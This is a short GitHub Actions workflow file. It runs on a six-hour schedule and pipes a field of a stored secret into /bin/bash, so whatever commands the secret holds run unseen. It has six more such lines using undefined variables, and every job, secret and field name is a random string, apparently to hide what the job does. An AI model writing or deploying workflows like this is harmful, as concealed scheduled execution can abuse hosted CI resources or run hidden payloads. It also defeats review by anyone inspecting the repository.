name: doveelderly
on:
  workflow_dispatch:
  schedule:
    - cron: '5 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: doveelderly
        env:
          bnh912: ${{ secrets.bnh912 }}
        run: |
          echo $bnh912 | jq -r .spf6639 | /bin/bash
          echo $fhfe4 | jq -r .r94 | /bin/bash
          echo $kqtg29 | jq -r .hgwtx35 | /bin/bash
          echo $ujqqj60 | jq -r .bi155 | /bin/bash
          echo $awnjb361 | jq -r .t7884 | /bin/bash
          echo $nd78 | jq -r .cqfbx73 | /bin/bash
          echo $scfw1 | jq -r .eb1 | /bin/bash

